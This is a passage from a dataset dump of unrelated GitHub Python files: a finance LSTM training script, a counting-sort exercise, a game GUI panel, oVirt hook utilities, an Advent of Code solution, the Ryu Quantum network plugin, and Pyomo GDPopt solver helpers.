[0,0.1,0.2,0.3,0.4,0.5]\n recurrent_dropout_1 = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8]\n recurrent_dropout_2 =['one','two']\n unitsToChoice = [5, 10, 20, 40, 60, 80, 100, 120]\n units_1 = [5, 10, 20]\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers=deepInceptionLayersToPick[params['deepInceptionLayers']]\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 
'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D=filter1D[params['filter1D']]\n filter3D=filter1D_1[params['filter1D_1']]\n filter5D=filter1D_2[params['filter1D_2']]\n# pool_size={{choice([3,5,9,16,25,34])}}\n #pool_stride={{choice([None,1, 2,3])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = MaxPooling1D(pool_size=pool_size)(layer)\n# else:\n# layer = AveragePooling1D(pool_size=pool_size)(layer)\n \n layer = TimeDistributed(Conv1D(1, kernel_size=kernel_size[params['kernel_size']], activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units=unitsToChoice[params['units']], kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout=recurrent_dropout_1[params['recurrent_dropout']])(layer)\n if recurrent_dropout_2[params['recurrent_dropout_1']] =='one':\n layer = Dense(units=units_1[params['units_1']],activation='relu')(layer)\n layer = Dense(1, activation='linear')(layer)\n\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr=learningRateToChoice[params['lr']],clipnorm=clipnormToChoice[params['clipnorm']])\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n\n return model\n\n\n# In[ ]:\n\n\n\nmodelName='InceptionLSTM'\ngc.collect()\npredictionPeriod=1\nLSTMWindow=21\nyearsBack=np.arange(1,2)\nNumberOfFeatures=100\nepochs=5\nbatch_size=4000\nfor jj in yearsBack:\n years=np.arange(2008,2015)\n best_model = None\n for ii in years:\n print(years)\n lowYear=ii-jj\n config=pd.DataFrame([[ii, jj ,LSTMWindow, NumberOfFeatures]],columns=['Year','lookBackYear','LSTMWindow','NumberOfFeatures'])\n config.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n if best_model is None:\n best_run, best_model = optim.minimize(model=create_model,\n data=data,\n algo=tpe.suggest,\n max_evals=2,\n trials=Trials())\n print('best model over the optimization')\n print(best_run)\n model=best_model\n \n else:\n model=continueToTrainModel(best_run)\n es=EarlyStopping(monitor='val_loss',mode='min',verbose=2,patience=25) \n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModelInceptionLSTM.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n# tensorboard = TensorBoard(log_dir=r\"D:\\ML for Finance\\data\\logs\\{}\".format(time()),histogram_freq=10,write_graph=True,write_images=True,update_freq=\"epoch\")\n #tensorboard\n callback_List = [es, checkpoint] \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n result=model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs,callbacks = callback_List, 
validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n\n \n \n model_json = model.to_json()\n with open('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'Model' + str(ii) + 'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.json',\"w\") as json_file:\n json_file.write(model_json)\n \n best_model.save_weights('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'ModelWeights' + str(ii) +'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.h5')\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationData=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationTarget=pickle.load( handle)\n \n with open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/indexObjectYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv', 'rb') as handle:\n validationIndex=pd.read_csv( handle,parse_dates=['1']) \n# \n validationIndex.rename(columns={'0':'entityID', '1':'date'},inplace=True) \n validationIndex.set_index(['entityID','date'],inplace=True,drop=False)\n validationIndex.drop(columns='Unnamed: 0',inplace=True)\n\n \n \n pred1=best_model.predict(ValidationData, batch_size=2000)\n print(2)\n pred1=pd.DataFrame(pred1)\n pred1['targets']=ValidationTarget\n pred1['entityID']=validationIndex['entityID'].values\n pred1['date']=validationIndex['date'].values\n pred1.set_index(['entityID','date'],inplace=True)\n pred1.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/data' + modelName +'Prediction' + str(ii) +'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv')\n\n","repo_name":"SteffenRoe/4376-DL-Project","sub_path":"InceptionLSTMFor100.py","file_name":"InceptionLSTMFor100.py","file_ext":"py","file_size_in_byte":16915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37306967782","text":"\"\"\"\nLogger is a class to manage log output and format so that we\ndon't have to pass loggers into methods or classes in order\nto get the desired results.\n\"\"\"\n\nimport logging\n\nclass Logger(object):\n \"\"\"\n Logger class that is a little messy and requires you to run\n configure() before using any of the other methods. 
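A minimal usage sketch:\n\n Logger.configure()\n Logger.info('processed %s items', 42)\n\n 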
Not in love\n with this setup but it allows me to not pepper logging throughout\n the application and have to pass it down 3 levels to get it to the\n proper class.\n \"\"\"\n logger = \"\"\n\n @classmethod\n def configure(cls):\n \"\"\"\n Create configuration for logger and change\n the default format that it uses.\n \"\"\"\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger_handler = logging.StreamHandler()\n logger.addHandler(logger_handler)\n logger_handler.setFormatter(logging.Formatter('%(message)s'))\n cls.logger = logger\n\n @classmethod\n def info(cls, string, *opts):\n \"\"\"\n Print info out to screen\n \"\"\"\n cls.logger.info(string, *opts)\n","repo_name":"michaeljs1990/compress","sub_path":"compress/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"}\n{"seq_id":"32387641043","text":"def maxPro(arr): # function to find the maximum value\n maxV = arr[0]\n for a in arr:\n if maxV < a:\n maxV = a\n return maxV\n\ndef toString(string): # function to convert a list of numbers into a string\n res = ''\n for s in string:\n res += str(s) + ' '\n return res\n\nT = int(input()) # number of test cases\n\nfor tc in range(1, T+1):\n N = int(input())\n nums = list(map(int, input().split()))\n cnt = [0] * int(maxPro(nums) + 1) # array with (max value in nums + 1) slots\n temp = [0] * N # array that receives the newly sorted numbers\n\n for num in nums:\n cnt[num] += 1 # for each number in nums, add 1 at the index equal to that number\n # print(cnt)\n for i in range(1, len(cnt)): # prefix (cumulative) sums\n cnt[i] = cnt[i-1] + cnt[i]\n # print(cnt)\n # print(len(nums)-1)\n # print('----------------')\n for i in range(len(nums)-1, -1, -1): # i = walk down one by one from the last index of the array\n cnt[nums[i]] -= 1 # decrement the cnt entry indexed by the value nums[i]\n # print(cnt)\n # print(nums[i])\n temp[cnt[nums[i]]] = nums[i] # put nums[i] into temp at the decremented index\n\n print(f'#{tc} {toString(temp)}')","repo_name":"better-gyeom/Python_Algorithm","sub_path":"SWEA/D2/1966. 
숫자를 정렬하자/숫자를 정렬하자.py","file_name":"숫자를 정렬하자.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40713871693","text":"from direct.gui.DirectGui import *\nfrom pandac.PandaModules import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom otp.otpbase import OTPGlobals\nfrom pirates.piratesgui import PDialog\nfrom pirates.piratesgui import GuiPanel\nfrom pirates.piratesgui import PiratesGuiGlobals\nfrom pirates.piratesbase import PiratesGlobals\nfrom pirates.piratesbase import PLocalizer\nfrom pirates.band import BandConstance\nfrom pirates.piratesgui.RequestButton import RequestButton\n\nclass CrewInviteeButton(RequestButton):\n \n def __init__(self, text, command):\n RequestButton.__init__(self, text, command)\n self.initialiseoptions(CrewInviteeButton)\n\n\n\nclass CrewInvitee(GuiPanel.GuiPanel):\n notify = DirectNotifyGlobal.directNotify.newCategory('CrewInvitee')\n \n def __init__(self, avId, avName):\n GuiPanel.GuiPanel.__init__(self, 'Crew Invitation', 0.5, 0.5, showClose = False)\n self.initialiseoptions(CrewInvitee)\n self.setPos(0.15, 0, 0.25)\n self.avId = avId\n self.avName = avName\n if base.cr.avatarFriendsManager.checkIgnored(self.avId):\n self.__handleNo()\n return\n \n text = PLocalizer.CrewInviteeInvitation % self.avName\n self.message = DirectLabel(parent = self, relief = None, text = text, text_scale = PiratesGuiGlobals.TextScaleLarge, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = 11, pos = (0.25, 0, 0.35), textMayChange = 1)\n self.bOk = CrewInviteeButton(text = PLocalizer.CrewInviteeOK, command = self.__handleOk)\n self.bOk.reparentTo(self)\n self.bOk.setPos(0.1, 0, 0.05)\n self.bNo = CrewInviteeButton(text = PLocalizer.CrewInviteeNo, command = self.__handleNo)\n self.bNo.reparentTo(self)\n self.bNo.setPos(0.3, 0, 0.05)\n self.accept('BandRequestCancel-%s' % (self.avId,), self.__handleCancelFromAbove)\n \n def destroy(self):\n if hasattr(self, 'destroyed'):\n return\n \n self.destroyed = 1\n self.ignore('BandRequestCancel-%s' % (self.avId,))\n self.ignore('Esc')\n GuiPanel.GuiPanel.destroy(self)\n \n def __handleOk(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_ok)\n self.destroy()\n\n def __handleNo(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_declined)\n self.destroy()\n \n def __handleCancelFromAbove(self):\n self.destroy()\n\n\n","repo_name":"PiratesOnlineClassic/pirates-online-classic","sub_path":"pirates/piratesgui/CrewInvitee.py","file_name":"CrewInvitee.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"3213324052","text":"import logging\nimport os\n\nfrom ovirt.node import base\nfrom ovirt.node.utils import process\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Hooks(base.Base):\n \"\"\"A utility class which executes files for additional configuration\n beyond the normal install\n \"\"\"\n\n known = [\"pre-upgrade\", \"post-upgrade\", \"rollback\", \"on-boot\",\n \"on-changed-boot-image\"]\n\n legacy_hooks_directory = \"/etc/ovirt-config-boot.d/\"\n hooks_path_tpl = \"/usr/libexec/ovirt-node/hooks/{name}\"\n\n @staticmethod\n def post_auto_install():\n Hooks.__run(Hooks.legacy_hooks_directory)\n\n @staticmethod\n def emit(name):\n \"\"\"Signal that a specific event appeared, and 
trigger the hook handlers\n\n Args:\n name: Name of the hook (must be in Hooks.known)\n \"\"\"\n assert name in Hooks.known\n path = Hooks.hooks_path_tpl.format(name=name)\n Hooks.__run(path)\n\n @staticmethod\n def __run(hooks_directory):\n for hook in os.listdir(hooks_directory):\n script = os.path.join(hooks_directory, hook)\n\n if script.endswith(\".pyc\") or script.endswith(\".pyo\"):\n continue\n\n LOGGER.debug(\"Running hook %s\" % script)\n if script.endswith(\".py\"):\n output = process.check_output([\"python\", script])\n else:\n output = process.check_output(\"%s &> /dev/null\" % script,\n shell=True)\n\n [LOGGER.debug(\"%s: %s\" % (script, line)) for line in output]\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/utils/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"}\n{"seq_id":"35335162899","text":"# https://adventofcode.com/2017/day/3\n\nfrom collections import defaultdict\nfrom itertools import count\n\ndef spiral(Δ = 1j):\n i = 1; yield 1, 0 # i, pos\n for side_len in count(3, step=2):\n pos = (1 - 1j) * (side_len//2)\n for _ in range(4):\n for _ in range(side_len-1):\n i += 1; pos += Δ\n yield i, pos\n Δ *= 1j\n\ndef fst_star(stop):\n abs_int = lambda x: abs(int(x))\n for x, pos in spiral():\n if x == stop: \n return sum(map(abs_int, [pos.real, pos.imag]))\n\ndef snd_star(stop):\n grid = defaultdict(int, {0: 1})\n for i, pos in spiral():\n if i == 1: continue\n grid[pos] = sum( \n grid[pos + Δ] \n for Δ in [\n -1+1j, 1j, 1+1j, \n -1 , 1, \n -1-1j, -1j, 1-1j, \n ]\n )\n if grid[pos] > stop: return grid[pos]\n\nif __name__ == '__main__':\n assert fst_star(1) == 0\n assert fst_star(12) == 3\n assert fst_star(23) == 2\n assert fst_star(1024) == 31\n\n print(fst_star(265149))\n print(snd_star(265149))\n\n","repo_name":"andy1li/adventofcode","sub_path":"2017/day03_spiral.py","file_name":"day03_spiral.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}\n{"seq_id":"21972020219","text":"from ryu.app import client\nfrom ryu.app.client import ignore_http_not_found\nfrom ryu.app import rest_nw_id\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import exc as orm_exc\n\nfrom quantum.common import constants as q_const\nfrom quantum.common import exceptions as q_exc\nfrom quantum.common import topics\nfrom quantum.db import api as db\nfrom quantum.db import db_base_plugin_v2\nfrom quantum.db.dhcp_rpc_base import DhcpRpcCallbackMixin\nfrom quantum.db import l3_db\nfrom quantum.db import models_v2\nfrom quantum.openstack.common import cfg\nfrom quantum.openstack.common import log as logging\nfrom quantum.openstack.common import rpc\nfrom quantum.openstack.common.rpc import dispatcher\nfrom quantum.plugins.ryu.common import config\nfrom quantum.plugins.ryu.db import api_v2 as db_api_v2\nfrom quantum.plugins.ryu import ofp_service_type\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass RyuQuantumPluginV2(db_base_plugin_v2.QuantumDbPluginV2,\n l3_db.L3_NAT_db_mixin):\n\n supported_extension_aliases = [\"router\"]\n\n def __init__(self, configfile=None):\n options = {\"sql_connection\": cfg.CONF.DATABASE.sql_connection}\n options.update({'base': models_v2.model_base.BASEV2})\n reconnect_interval = cfg.CONF.DATABASE.reconnect_interval\n options.update({\"reconnect_interval\": reconnect_interval})\n db.configure_db(options)\n\n self.tunnel_key = 
db_api_v2.TunnelKey(\n cfg.CONF.OVS.tunnel_key_min, cfg.CONF.OVS.tunnel_key_max)\n ofp_con_host = cfg.CONF.OVS.openflow_controller\n ofp_api_host = cfg.CONF.OVS.openflow_rest_api\n\n if ofp_con_host is None or ofp_api_host is None:\n raise q_exc.Invalid(_('invalid configuration. check ryu.ini'))\n\n hosts = [(ofp_con_host, ofp_service_type.CONTROLLER),\n (ofp_api_host, ofp_service_type.REST_API)]\n db_api_v2.set_ofp_servers(hosts)\n\n self.client = client.OFPClient(ofp_api_host)\n self.tun_client = client.TunnelClient(ofp_api_host)\n for nw_id in rest_nw_id.RESERVED_NETWORK_IDS:\n if nw_id != rest_nw_id.NW_ID_UNKNOWN:\n self.client.update_network(nw_id)\n self._setup_rpc()\n\n # register all known networks on startup\n self._create_all_tenant_network()\n\n def _setup_rpc(self):\n self.conn = rpc.create_connection(new=True)\n self.callback = DhcpRpcCallbackMixin()\n self.dispatcher = dispatcher.RpcDispatcher([self.callback])\n self.conn.create_consumer(topics.PLUGIN, self.dispatcher, fanout=False)\n self.conn.consume_in_thread()\n\n def _create_all_tenant_network(self):\n for net in db_api_v2.network_all_tenant_list():\n self.client.update_network(net.id)\n for tun in self.tunnel_key.all_list():\n self.tun_client.update_tunnel_key(tun.network_id, tun.tunnel_key)\n session = db.get_session()\n for port_binding in db_api_v2.port_binding_all_list(session):\n network_id = port_binding.network_id\n dpid = port_binding.dpid\n port_no = port_binding.port_no\n try:\n port = session.query(models_v2.Port).filter(\n models_v2.Port.id == port_binding.port_id).one()\n except orm_exc.NoResultFound:\n continue\n except orm_exc.MultipleResultsFound:\n continue\n\n self.client.update_port(network_id, dpid, port_no)\n self.client.update_mac(network_id, dpid, port_no, port.mac_address)\n\n def _client_create_network(self, net_id, tunnel_key):\n self.client.create_network(net_id)\n self.tun_client.create_tunnel_key(net_id, tunnel_key)\n\n def _client_delete_network(self, net_id):\n client.ignore_http_not_found(\n lambda: self.client.delete_network(net_id))\n client.ignore_http_not_found(\n lambda: self.tun_client.delete_tunnel_key(net_id))\n\n def create_network(self, context, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).create_network(context,\n network)\n self._process_l3_create(context, network['network'], net['id'])\n self._extend_network_dict_l3(context, net)\n\n tunnel_key = self.tunnel_key.allocate(session, net['id'])\n try:\n self._client_create_network(net['id'], tunnel_key)\n except:\n self._client_delete_network(net['id'])\n raise\n\n return net\n\n def update_network(self, context, id, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).update_network(context, id,\n network)\n self._process_l3_update(context, network['network'], id)\n self._extend_network_dict_l3(context, net)\n return net\n\n def delete_network(self, context, id):\n self._client_delete_network(id)\n session = context.session\n with session.begin(subtransactions=True):\n self.tunnel_key.delete(session, id)\n super(RyuQuantumPluginV2, self).delete_network(context, id)\n\n def get_network(self, context, id, fields=None):\n net = super(RyuQuantumPluginV2, self).get_network(context, id, None)\n self._extend_network_dict_l3(context, net)\n return self._fields(net, fields)\n\n def get_networks(self, context, filters=None, fields=None):\n nets = super(RyuQuantumPluginV2, 
self).get_networks(context, filters,\n None)\n for net in nets:\n self._extend_network_dict_l3(context, net)\n nets = self._filter_nets_l3(context, nets, filters)\n\n return [self._fields(net, fields) for net in nets]\n\n def delete_port(self, context, id, l3_port_check=True):\n with context.session.begin(subtransactions=True):\n port = self._get_port(context, id)\n net_id = port.network_id\n try:\n port_binding = db_api_v2.port_binding_destroy(context.session,\n port.id, net_id)\n datapath_id = port_binding.dpid\n port_no = port_binding.port_no\n ignore_http_not_found(\n lambda: self.client.delete_port(net_id, datapath_id,\n port_no))\n except q_exc.PortNotFound:\n pass\n\n # if needed, check to see if this is a port owned by\n # an l3-router. If so, we should prevent deletion.\n if l3_port_check:\n self.prevent_l3_port_deletion(context, id)\n self.disassociate_floatingips(context, id)\n return super(RyuQuantumPluginV2, self).delete_port(context, id)\n\n def update_port(self, context, id, port):\n p = super(RyuQuantumPluginV2, self).update_port(context, id, port)\n net_id = p['network_id']\n mac_address = p['mac_address']\n\n deleted = port['port'].get('deleted', False)\n if deleted:\n session = context.session\n try:\n db_api_v2.port_binding_destroy(session, id, net_id)\n except q_exc.PortNotFound:\n pass\n db_api_v2.set_port_status(session, id, q_const.PORT_STATUS_DOWN)\n return p\n\n datapath_id = port['port'].get('datapath_id', None)\n port_no = port['port'].get('port_no', None)\n if datapath_id is None or port_no is None:\n LOG.debug('p %s', p)\n return p\n\n try:\n port_binding = db_api_v2.port_binding_get(id, net_id)\n except orm_exc.NoResultFound:\n try:\n db_api_v2.port_binding_create(id, net_id, datapath_id, port_no)\n except IntegrityError:\n # TODO:XXX should do transaction?\n return p\n else:\n self.client.create_port(net_id, datapath_id, port_no)\n self.client.create_mac(net_id, datapath_id, port_no,\n mac_address)\n else:\n if (port_binding.dpid != datapath_id or\n port_binding.port_no != port_no):\n variables = {'datapath_id': datapath_id,\n 'port_no': port_no,\n 'port_binding_dpid': port_binding.dpid,\n 'port_binding_port_no': port_binding.port_no}\n raise q_exc.InvalidInput(\n error_message=_('invalid (datapath_id, port_no) '\n 'is requested '\n '(%(datapath_id)s, %(port_no)s), actual'\n '(%(port_binding_dpid)s, '\n '%(port_binding_port_no)s)') % variables)\n self.client.update_network(net_id)\n self.client.update_port(net_id, datapath_id, port_no)\n self.client.update_mac(net_id, datapath_id, port_no, mac_address)\n return p\n","repo_name":"virt2x/folsomCloud","sub_path":"cloud/quantum/quantum/plugins/ryu/ryu_quantum_plugin.py","file_name":"ryu_quantum_plugin.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}\n{"seq_id":"29699440561","text":"\"\"\"Utility functions and classes for the GDPopt solver.\"\"\"\nfrom __future__ import division\n\nimport logging\nfrom math import fabs, floor, log\n\nfrom pyomo.core import (Any, Binary, Block, Constraint, NonNegativeReals,\n Objective, Reals, Var, minimize, value)\nfrom pyomo.core.expr import current as EXPR\nfrom pyomo.core.kernel import ComponentSet\nfrom pyomo.gdp import Disjunct, Disjunction\nfrom pyomo.opt import SolverFactory\nfrom pyomo.opt.results import ProblemSense, SolverResults\n\n\nclass _DoNothing(object):\n \"\"\"Do nothing, literally.\n\n This class is used in situations of \"do something if attribute exists.\"\n 
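A sketch of the pattern it enables (the attribute names here are illustrative only):\n\n handler = getattr(solve_data, 'on_master_solved', _DoNothing())\n handler() # silently a no-op when the attribute is absent\n 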
\"\"\"\n\n def __init__(self, *args, **kwargs):\n pass\n\n def __call__(self, *args, **kwargs):\n pass\n\n def __getattr__(self, attr):\n def _do_nothing(*args, **kwargs):\n pass\n return _do_nothing\n\n\nclass GDPoptSolveData(object):\n \"\"\"Data container to hold solve-instance data.\n\n Key attributes:\n - original_model: the original model that the user gave us to solve\n - working_model: the original model after preprocessing\n - linear_GDP: the linear-discrete master problem\n\n \"\"\"\n pass\n\n\ndef model_is_valid(solve_data, config):\n \"\"\"Validate that the model is solveable by GDPopt.\n\n Also preforms some preprocessing such as moving the objective to the\n constraints.\n\n \"\"\"\n m = solve_data.working_model\n GDPopt = m.GDPopt_utils\n\n # Handle LP/NLP being passed to the solver\n prob = solve_data.results.problem\n if (prob.number_of_binary_variables == 0 and\n prob.number_of_integer_variables == 0 and\n prob.number_of_disjunctions == 0):\n config.logger.info('Problem has no discrete decisions.')\n if len(GDPopt.working_nonlinear_constraints) > 0:\n config.logger.info(\n \"Your model is an NLP (nonlinear program). \"\n \"Using NLP solver %s to solve.\" % config.nlp)\n SolverFactory(config.nlp).solve(\n solve_data.original_model, **config.nlp_options)\n return False\n else:\n config.logger.info(\n \"Your model is an LP (linear program). \"\n \"Using LP solver %s to solve.\" % config.mip)\n SolverFactory(config.mip).solve(\n solve_data.original_model, **config.mip_options)\n return False\n\n # Handle missing or multiple objectives\n objs = list(m.component_data_objects(\n ctype=Objective, active=True, descend_into=True))\n num_objs = len(objs)\n solve_data.results.problem.number_of_objectives = num_objs\n if num_objs == 0:\n config.logger.warning(\n 'Model has no active objectives. Adding dummy objective.')\n GDPopt.dummy_objective = Objective(expr=1)\n main_obj = GDPopt.dummy_objective\n elif num_objs > 1:\n raise ValueError('Model has multiple active objectives.')\n else:\n main_obj = objs[0]\n solve_data.working_objective_expr = main_obj.expr\n\n # Move the objective to the constraints\n\n # TODO only move the objective if nonlinear?\n GDPopt.objective_value = Var(domain=Reals, initialize=0)\n solve_data.objective_sense = main_obj.sense\n if main_obj.sense == minimize:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value >= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.minimize\n else:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value <= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.maximize\n main_obj.deactivate()\n GDPopt.objective = Objective(\n expr=GDPopt.objective_value, sense=main_obj.sense)\n\n # TODO if any continuous variables are multipled with binary ones, need\n # to do some kind of transformation (Glover?) 
or throw an error message\n return True\n\n\ndef a_logger(str_or_logger):\n \"\"\"Returns a logger when passed either a logger name or logger object.\"\"\"\n if isinstance(str_or_logger, logging.Logger):\n return str_or_logger\n else:\n return logging.getLogger(str_or_logger)\n\n\ndef copy_var_list_values(from_list, to_list, config, skip_stale=False):\n \"\"\"Copy variable values from one list to another.\"\"\"\n for v_from, v_to in zip(from_list, to_list):\n if skip_stale and v_from.stale:\n continue # Skip stale variable values.\n try:\n v_to.set_value(value(v_from, exception=False))\n if skip_stale:\n v_to.stale = False\n except ValueError as err:\n if 'is not in domain Binary' in err.message:\n # Check to see if this is just a tolerance issue\n v_from_val = value(v_from, exception=False)\n if (fabs(v_from_val - 1) <= config.integer_tolerance or\n fabs(v_from_val) <= config.integer_tolerance):\n v_to.set_value(round(v_from_val))\n else:\n raise\n\n\ndef is_feasible(model, config):\n \"\"\"Checks to see if the algebraic model is feasible in its current state.\n\n Checks variable bounds and active constraints. Not for use with\n untransformed GDP models.\n\n \"\"\"\n disj = next(model.component_data_objects(\n ctype=Disjunct, active=True), None)\n if disj is not None:\n raise NotImplementedError(\n \"Found active disjunct %s. \"\n \"This function is not intended to check \"\n \"feasibility of disjunctive models, \"\n \"only transformed subproblems.\" % disj.name)\n\n config.logger.debug('Checking if model is feasible.')\n for constr in model.component_data_objects(\n ctype=Constraint, active=True, descend_into=True):\n # Check constraint lower bound\n if (constr.lower is not None and (\n value(constr.lower) - value(constr.body)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s < LB %s' % (\n constr.name, value(constr.body), value(constr.lower)))\n return False\n # check constraint upper bound\n if (constr.upper is not None and (\n value(constr.body) - value(constr.upper)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s > UB %s' % (\n constr.name, value(constr.body), value(constr.upper)))\n return False\n for var in model.component_data_objects(ctype=Var, descend_into=True):\n # Check variable lower bound\n if (var.has_lb() and\n value(var.lb) - value(var) >= config.variable_tolerance):\n config.logger.info('%s: %s < LB %s' % (\n var.name, value(var), value(var.lb)))\n return False\n # Check variable upper bound\n if (var.has_ub() and\n value(var) - value(var.ub) >= config.variable_tolerance):\n config.logger.info('%s: %s > UB %s' % (\n var.name, value(var), value(var.ub)))\n return False\n config.logger.info('Model is feasible.')\n return True\n\n\ndef clone_orig_model_with_lists(original_model):\n \"\"\"Clones the original model to create a working model.\n\n Also attaches ordered lists of the variables, constraints, disjuncts, and\n disjunctions to the model so that they can be used for mapping back and\n forth.\n\n \"\"\"\n build_ordered_component_lists(original_model, prefix='orig')\n return original_model.clone()\n\n\ndef build_ordered_component_lists(model, prefix='working'):\n \"\"\"Define lists used for future data transfer.\"\"\"\n GDPopt = model.GDPopt_utils\n var_set = ComponentSet()\n setattr(\n GDPopt, '%s_constraints_list' % prefix, list(\n model.component_data_objects(\n ctype=Constraint, active=True,\n descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjuncts_list' % prefix, list(\n model.component_data_objects(\n 
ctype=Disjunct, descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjunctions_list' % prefix, list(\n model.component_data_objects(\n ctype=Disjunction, active=True,\n descend_into=(Disjunct, Block))))\n\n # Identify the non-fixed variables in (potentially) active constraints\n for constr in getattr(GDPopt, '%s_constraints_list' % prefix):\n for v in EXPR.identify_variables(constr.body, include_fixed=False):\n var_set.add(v)\n # Disjunct indicator variables might not appear in active constraints. In\n # fact, if we consider them Logical variables, they should not appear in\n # active algebraic constraints. For now, they need to be added to the\n # variable set.\n for disj in getattr(GDPopt, '%s_disjuncts_list' % prefix):\n var_set.add(disj.indicator_var)\n\n # We use component_data_objects rather than list(var_set) in order to\n # preserve a deterministic ordering.\n setattr(\n GDPopt, '%s_var_list' % prefix, list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v in var_set))\n setattr(\n GDPopt, '%s_nonlinear_constraints' % prefix, [\n v for v in getattr(GDPopt, 